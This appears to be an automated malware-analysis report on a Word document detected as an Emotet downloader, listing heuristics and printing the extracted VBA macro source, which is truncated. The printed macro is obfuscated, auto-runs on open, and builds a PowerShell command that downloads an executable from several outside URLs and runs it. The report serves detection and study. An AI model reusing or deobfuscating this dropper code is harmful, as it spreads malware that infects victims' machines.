MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample was identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6883987-0. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common execution vector for Emotet. The macro contains a Shell() call, indicating it is designed to execute a command-line payload, likely a downloader for further stages.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6883987-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883987-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4525 bytes |
SHA-256: fa33e8644f969be64a970850433575910e011f7449a6fbb1dced897d4bd855aa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wOSbidJEwoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If GNftC >= vtKflX Then
qXjFwG = "XUK"
End If
If rpMqWN Or 17 Then
DhCFsL = "bLEwHEWk"
End If
If zObiC >= iISXFc Then
GwJmpu = "XlXERW"
End If
If jJHjO <> sHmJo Then
RzpDK = "iRVdwcp"
End If
If UQwYXp <= UdtDGT Then
vPNpih = "lw"
End If
If ibwTS Xor 4 Then
wdmaop = "c"
End If
If ZrYPu < mbAij Then
LzdISH = "Nwpt"
End If
If PiEaBw Or bwkzL Then
UjUJV = "OzAKKFdhWHZK"
End If
If QBtSv >= jrABpq Then
RswuQ = "AjU"
End If
sQYYMujFlRoYkP (KeyString(wUPjdlDs + KiDoR + 7 + 16 + 44 + CoRnuW + SVDiZHJz) + tQTDQC + QRdBKp + KeyString(iswEE + kLQAKYD + 8 + 19 + 50 + FQYoBzX + fGMVQKNj) + sRjwvDrpW + zOzND + WdsLzPTzPtB + sCsNAjQW + jmORqTj)
If NjdPjv Or 14 Then
CIBHj = "zLASwBdDr"
End If
If XjUdz <> aWwIP Then
onujfp = "RUWPKm"
End If
If SPPjns >= aSCdfw Then
dScCvI = "UtpJ"
End If
If aqPXtU > 19 Then
RoUZa = "SVbjcvUGzaf"
End If
End Sub
Attribute VB_Name = "rINhVsJrzbp"
Function sRjwvDrpW()
If sFNJWU <= 17 Then
vzbjvH = "DwkWcwCL"
End If
If irMDG <> 8 Then
ziwAMS = "irhNjMllkU"
End If
PscqfluA = "d /V^:/C" + """" + "^s^e^t " + "^4^IN^x=^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ "
If pJnAN >= jnhwzF Then
MiLOhL = "tfJN"
End If
If sHvjk <> XjNOtk Then
ajmWl = "H"
End If
NATFtkVQEP = "^ ^ ^ ^ ^}" + "^}{^hc^t^ac^" + "}^;^ka^er^b;" + "^S^L^t^$^ m" + "^e^t^I^-^e^k^ovn^"
If HHqsp And 17 Then
tsPiAf = "Tw"
End If
If MfZFGQ And Slwjjj Then
ahzlP = "THLWVwXMJzamR"
End If
BVidMjAFz = "I^;)^S^L^t^$^" + " ^,^X^m^i^$(e^l" + "^iF^d^a^o^lnw"
sRjwvDrpW = PscqfluA + NATFtkVQEP + BVidMjAFz
If QSPmEG And wRkGtj Then
uhAYFj = "vDpZKOt"
End If
If AcEUCk Xor saJmW Then
PkjSZG = "aEZPvsVQJsKm"
End If
If wzYJzS Xor jVAJi Then
pICLkV = "sljOPUPa"
End If
End Function
Function zOzND()
Hwivjl = "^o^D^.^i^M^A^" + "$^{^yr^t^{)^t^s^M^$^" + " n^i^ ^Xm^i^$(^hc^" + "a^er^o^f^;^'^e^x^e^." + "^'^+H^hv^$+^'^" + "\^'^+c^il^b^u"
nTNGjtpJH = "^p^:vn^e^$" + "^=^S^L^t^$;^'^21^'" + "^ ^=^ ^H^hv^" + "$^;)^'^@^'(^ti^l^p^S" + "^.^'^a^b^mNv/^m^o" + "c^.na^br^o^a^ile"
KhPzTrtWRmJ = "nro^k//^:^p^t^t^h" + "^@^T^2/^o^fn" + "^i^.r^o^t^a^mr" + "^a//:p^t^t^h^@^s^i"
mSaur = "^l^z/^t^en" + "^.^t^o^ic^h//^:^" + "p^t^t^h@^9^Tr^Dc^D^" + "k/^m^oc^.^enn^a^sr^u" + "//:^p^t^t^"
SipsfGY = "h^@^T^K^K^Y/^m^" + "oc^.^av^odr^oc" + "r^o^tc^e^h//^:^p^t^t" + "^h^'=^t^s^M$^"
zOzND = Hwivjl + nTNGjtpJH + KhPzTrtWRmJ + mSaur + SipsfGY
If SKuiD < SbITQE Then
Chozt = "Y"
End If
If pNjlGU = lcRUD Then
atINj = "zdXG"
End If
If czGdD Or dpKdd Then
RfrWYR = "v"
End If
If oWMBuq = 8 Then
OSGtYn = "cHY"
End If
End Function
Function WdsLzPTzPtB()
If wDETt > PTzlJM Then
aNofIL = "bvJ"
End If
If BJKiOW <> sUjWF Then
hsIqQA = "koKctwoEpW"
End If
iIhGWj = ";tn^e^i^lC^b^e^W^" + ".t^eN^ ^tc^e^j" + "^b^o^-^w^e" + "n^=^i^M^A^$"
If trUMv Xor 18 Then
lsiLJw = "mKFt"
End If
If lShHCz >= zIbdZ Then
KBhlw = "wiTiAZjLB"
End If
AqPkIbMn = "^ l^l^e^h^" + "sr^e^w^o^p&&" + "^f^or /^L %^H " + "^in (^3^41^;-^1^"
If olBwp = nJXCq Then
JUMdME = "M"
End If
If KKiAzR Eqv hhWmCA Then
hmEDP = "vs"
End If
If Evjoqr <> RzYzD Then
ovIwN = "Mwdvdwu"
End If
If wKEYB >= lYwRuN Then
OQnrO = "ciwQwdkqlr"
End If
fqnEXwc = ";^0)^d^o ^s^e" + "^t ^u^W=!^u" + "^W!!^4^IN^x:~%^H" + ",1!&&^i^f " + "%^H=^=^0 c^a^l^l " + "%^u^W:^~^4%" + """" + " "
iERUKkz = ""
WdsLzPTzPtB = iIhGWj + AqPkIbMn + fqnEXwc + iERUKkz
If maADqw <= VAzXSw Then
wcdYni = "zrqwDCvNpHb"
End If
If zAjHj <= SfZZva Then
lEfurK = "bsY"
End If
End Function
Attribute VB_Name = "nalkYiQ"
Function sQYYMujFlRoYkP(dUzurzYwjF As String)
Const tMICaPa = 233016815 - 233016815
If WSHwjV > QrqJp Then
LjunHc = "fiGq"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.